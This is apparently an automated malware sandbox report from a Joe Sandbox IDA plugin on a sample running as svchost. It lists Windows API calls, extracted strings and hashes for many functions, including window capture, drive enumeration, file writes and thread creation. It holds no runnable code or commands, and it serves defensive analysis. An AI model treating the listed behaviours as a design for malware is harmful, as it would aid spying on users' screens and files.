                                                                                                                                                                                                                  • Part of subcall function 02D3DCA0: PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3DD63
                                                                                                                                                                                                                  • Part of subcall function 02D3DCA0: PathFileExistsA.SHLWAPI(00000000), ref: 02D3DDA9
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44123
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44136
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44149
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D44177
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D441AD
                                                                                                                                                                                                                  • Part of subcall function 02D440E0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D4420D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: isdigit$Path$Backslash$strstr$Heapmemset$AllocCreateDirectoryExistsFileProcessReadmemcpy
                                                                                                                                                                                                                • String ID: GET $POST
                                                                                                                                                                                                                • API String ID: 1864109261-2494278042
                                                                                                                                                                                                                • Opcode ID: 242d1049064edd71d367baa0f87c59b214237d2d7f5640c1ccd1d70561da99bd
                                                                                                                                                                                                                • Instruction ID: d66d5c05b940130eda62f7255854e8738408e2e66b3a1b0369293df8a89d7aec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 242d1049064edd71d367baa0f87c59b214237d2d7f5640c1ccd1d70561da99bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F028315096542BD7337651EC84FAF6B9ECD42744B044429F505D2300DB34EC81EAF5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D2C8C0: IsWindowVisible.USER32(02D2D04D), ref: 02D2C8DF
                                                                                                                                                                                                                  • Part of subcall function 02D2C8C0: GetWindowInfo.USER32(02D2D04D,?), ref: 02D2C8F9
                                                                                                                                                                                                                  • Part of subcall function 02D2C8C0: GetClassLongA.USER32(02D2D04D,000000E6), ref: 02D2C94E
                                                                                                                                                                                                                  • Part of subcall function 02D2C8C0: PrintWindow.USER32(02D2D04D,?,00000000), ref: 02D2C967
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2CB41
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91
                                                                                                                                                                                                                • GetWindow.USER32(02D2D04D,00000005), ref: 02D2CB5C
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2CB5F
                                                                                                                                                                                                                  • Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000003), ref: 02D2CB6A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Info$LongScroll$ClassPrintRectVisiblememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 406580094-0
                                                                                                                                                                                                                • Opcode ID: 62ae9d1d941572270a632eabca72b1c73baf0ac07d2b4fa8853c9098be409e9f
                                                                                                                                                                                                                • Instruction ID: febc2b0cee0e0ff1e1e459bf186ec0544517991a08deecc1bc9e49eb45dab957
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62ae9d1d941572270a632eabca72b1c73baf0ac07d2b4fa8853c9098be409e9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0C872B5021437DA11B668AC85FAFB76DDB94B54F010016F904A7380DAA0AD054AF5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,75B05CE0,?,?,02D3DDE9,00000000), ref: 02D273B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02D3DDE9,00000000), ref: 02D273C7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,02D3DDE9,00000000), ref: 02D273D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02D3DDE9,00000000), ref: 02D273E9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3342219707-0
                                                                                                                                                                                                                • Opcode ID: b30398be20e4f7ce5fcb444b9fbc83fc08bc3cacbed86e5670fc512190d2195d
                                                                                                                                                                                                                • Instruction ID: 76acc850955b5bc148d3e1d93b74ff60fd75ff80802ed2b3475a72a0be524aa5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b30398be20e4f7ce5fcb444b9fbc83fc08bc3cacbed86e5670fc512190d2195d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F036B1691218BFE7208F60DC4DFAF7BACEB49785F508415FA04D6280D6745E50C7B5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02D240EB,?), ref: 02D23E5C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D240EB,?), ref: 02D23E63
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D23EA2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                                                                                                                • API String ID: 1060465051-3491811756
                                                                                                                                                                                                                • Opcode ID: ebf736ea9721020117d590ce116b2c10f642c6ba8c0eb470a1acb76ddd7610f4
                                                                                                                                                                                                                • Instruction ID: 8655c3f484cc481ca9cda9f19aae74b0af1cef1f7a693490d59bf8e733a44b96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebf736ea9721020117d590ce116b2c10f642c6ba8c0eb470a1acb76ddd7610f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF081B1940720AFC3708F69A808B67BBF8EF0C611B40892EF589C6341D23496448BB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000,75B07390,?,?,02D36AFD), ref: 02D3A25A
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D3A274
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,?,02D36AFD), ref: 02D3A28C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D36AFD), ref: 02D3A29D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandle$CloseInformationMutexThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3835061634-0
                                                                                                                                                                                                                • Opcode ID: c81ac57ad2ed72614d9e20f6ad0d12f30547fc638083439b9be529992a3ad04f
                                                                                                                                                                                                                • Instruction ID: 7643174e96dee9f03ec9a33873cf194aa181f8b4281df076be7d15d1c3a541de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c81ac57ad2ed72614d9e20f6ad0d12f30547fc638083439b9be529992a3ad04f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF06D35E85314BFE7618B60FC0EF5A3BA8AB04B11F644445FD01AB3C0DBB1AD108BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000,?,?,02D3882E,00000000,02D30943,?,?,?,?,?,?), ref: 02D3EA30
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3E8D0,00000000,00000000,00000000), ref: 02D3EA45
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D3882E,00000000), ref: 02D3EA63
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D3882E,00000000), ref: 02D3EA74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1825730051-0
                                                                                                                                                                                                                • Opcode ID: 3b718a1b46dace82f88dfe691c008467709fd4f4b79aaaf2eaf1444e30e27db6
                                                                                                                                                                                                                • Instruction ID: ed6868bac8ccf3018d173d100eaf5496ebee446249ae051952a2ce955615a13e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b718a1b46dace82f88dfe691c008467709fd4f4b79aaaf2eaf1444e30e27db6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92F0B470A88314BBE721CBA4EC0EB5A379CAF04B45F204554F909E23C0EBB49D14C6A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000,?,?,02D3868E,00000000,02D30943,?,?,?,?,?,?), ref: 02D3B3A0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3B240,00000000,00000000,00000000), ref: 02D3B3B5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D3868E,00000000), ref: 02D3B3D3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D3868E,00000000), ref: 02D3B3E4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1825730051-0
                                                                                                                                                                                                                • Opcode ID: ba354c66b3bf215a2b16334d2fde2f96fc5885748926e7c892ca928c614b8bb6
                                                                                                                                                                                                                • Instruction ID: 8652f59445391656a39f1c6f1b97cdb72ac61e3d6777f29a21aadb85642f4091
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba354c66b3bf215a2b16334d2fde2f96fc5885748926e7c892ca928c614b8bb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33F0B471A84314BBE7219B65EC0EF5A379CAB04749F244546F905E23C0EBB0ED14C674
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000,?,?,02D388DE,00000000,02D30943,?,?,?,?,?,?), ref: 02D3F940
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3F7E0,00000000,00000000,00000000), ref: 02D3F955
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D388DE,00000000), ref: 02D3F973
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02D388DE,00000000), ref: 02D3F984
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1825730051-0
                                                                                                                                                                                                                • Opcode ID: 361ebc7f032d582e5fe2c41d10c59a579bd89da3f05c42faf0cae1a82ade4e87
                                                                                                                                                                                                                • Instruction ID: fcea2d2b1a9eb28b83bc0c3c5c29b79b04593f7ae02ac97709efbd3ec3dcd7d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 361ebc7f032d582e5fe2c41d10c59a579bd89da3f05c42faf0cae1a82ade4e87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF05470E84308BFE7218B65EC0EB5E779CAB18755F644954F909E23C0EBB49D14C674
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: private$public
                                                                                                                                                                                                                • API String ID: 0-4176808989
                                                                                                                                                                                                                • Opcode ID: f6908cfcfda4f973b81cef9494c862ddc13027cfd4aa773ca5ce10f620f7912b
                                                                                                                                                                                                                • Instruction ID: a18bbe05b8d4cbc64440a3acde0be896861a36f32be6d03af874f209e7fd2653
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6908cfcfda4f973b81cef9494c862ddc13027cfd4aa773ca5ce10f620f7912b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7412732A0410D4FCB328B6CD8557BB73A2FB85228B5886A5D886CBB64F7759D45C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountTick_snprintf
                                                                                                                                                                                                                • String ID: %dd %dh %dm
                                                                                                                                                                                                                • API String ID: 3495410349-3074259717
                                                                                                                                                                                                                • Opcode ID: d5434d4c7a9cab1f78b923c9489aa32adcb0d638ddbcab3419d0a0b0b0a475cb
                                                                                                                                                                                                                • Instruction ID: 37e920fe81f9100e27cda343d47805d50ed307b2eda8b58cb7185bb8b02329a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5434d4c7a9cab1f78b923c9489aa32adcb0d638ddbcab3419d0a0b0b0a475cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0E232B8101117A31C582DBD0AABA5A4B8BD832138CC63DFD0ADF3D8DCB89C5141D0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: memset.MSVCRT ref: 02D3E1CF
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: memset.MSVCRT ref: 02D3E1F1
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3E206
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: SetErrorMode.KERNEL32(00000001), ref: 02D3E21F
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: GetDriveTypeA.KERNEL32(?), ref: 02D3E268
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E27B
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: FindFirstFileA.KERNEL32(?,?), ref: 02D3E2DD
                                                                                                                                                                                                                  • Part of subcall function 02D3E1B0: SetErrorMode.KERNEL32(?), ref: 02D3E5F3
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC03F), ref: 02D3E60B
                                                                                                                                                                                                                  • Part of subcall function 02D33590: EnterCriticalSection.KERNEL32(02D6FB68,?,5E8DC08D,75B0A250), ref: 02D335A9
                                                                                                                                                                                                                  • Part of subcall function 02D33590: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02D335BB
                                                                                                                                                                                                                  • Part of subcall function 02D33590: _snprintf.MSVCRT ref: 02D335DB
                                                                                                                                                                                                                  • Part of subcall function 02D33590: SetCurrentDirectoryA.KERNEL32(?), ref: 02D335EB
                                                                                                                                                                                                                  • Part of subcall function 02D33590: PathAddBackslashA.SHLWAPI(?), ref: 02D336C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                                • String ID: 5E8DC03F$COLV
                                                                                                                                                                                                                • API String ID: 2461973751-2191568894
                                                                                                                                                                                                                • Opcode ID: 48b9da4081db8ea976d7896b9e328021849f59c531943303bdd1b4bbc0dade64
                                                                                                                                                                                                                • Instruction ID: 9edb028271113eaa8e29b612928c06effe82fa10704e6f7bd9618616eaf0f1d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48b9da4081db8ea976d7896b9e328021849f59c531943303bdd1b4bbc0dade64
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56B09B729D0301A9F00537B4B90E91517214944D06710095571437434499D97C544776
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2A3
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2A6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2B2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2B5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: 7cef083d521555f66b7eedd5b4a8f027f30afa664a00ce7dd4dc36db1fd12669
                                                                                                                                                                                                                • Instruction ID: e42615934a20bc18bc768afe1671a22525e6ec60789b602cb4c9f74daf8225ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cef083d521555f66b7eedd5b4a8f027f30afa664a00ce7dd4dc36db1fd12669
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 182179B29052209FDB54CF79D88462A7BE9FA58218325897ED50BDB700D732EC56CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4ABFE
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4AC13
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4AC39
                                                                                                                                                                                                                • malloc.MSVCRT ref: 02D4AC54
                                                                                                                                                                                                                  • Part of subcall function 02D4A520: free.MSVCRT(?,?,?,75977310,?,02D4CA12,?,?,?,02D49E28), ref: 02D4A54F
                                                                                                                                                                                                                  • Part of subcall function 02D4A520: free.MSVCRT(02D4CA12,?,?,75977310,?,02D4CA12,?,?,?,02D49E28), ref: 02D4A55F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1480856625-0
                                                                                                                                                                                                                • Opcode ID: d429053f432001c3e714c69af28851a93517db2fad9d22349513c617580852a5
                                                                                                                                                                                                                • Instruction ID: 1cf77baaaea6ba01c20bf430f69f5b46c5e79f9feb42aa1f735c9790113c97e0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d429053f432001c3e714c69af28851a93517db2fad9d22349513c617580852a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921CAB1A013059FD710CF2AD884A46FBE8FF98310F15C5AAE5488B362D7B1E810CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-05ADF5B4,?,02D2FA47,?,?,02D2EF16,00000000,00000008,?,02D2FA47,Content-Length,00000008,?,02D2FA47,Transfer-Encoding), ref: 02D2E87F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D2EF16,00000000,00000008,?,02D2FA47,Content-Length,00000008,?,02D2FA47,Transfer-Encoding,00000008,HTTP/1.,00000007,?), ref: 02D2E886
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2E896
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2E8A1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 96079ed5c2fb2cf6b41dd4c179035e0bff85420508497767b39761fd085c0b61
                                                                                                                                                                                                                • Instruction ID: 38b083f949e1b0c857703b896ac41bddd7e7faa3fd2613c13d37a367e129c017
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96079ed5c2fb2cf6b41dd4c179035e0bff85420508497767b39761fd085c0b61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9401F7326416256B97209A69AC84FA7B39CEF96768B404251FD84DB380D720ED08C7F0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,00000018,?,00000000,?,02D3056E,?,?,02D30D4A,?), ref: 02D3A898
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D3056E,?,?,02D30D4A,?), ref: 02D3A89F
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3A8AF
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D3A8BD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
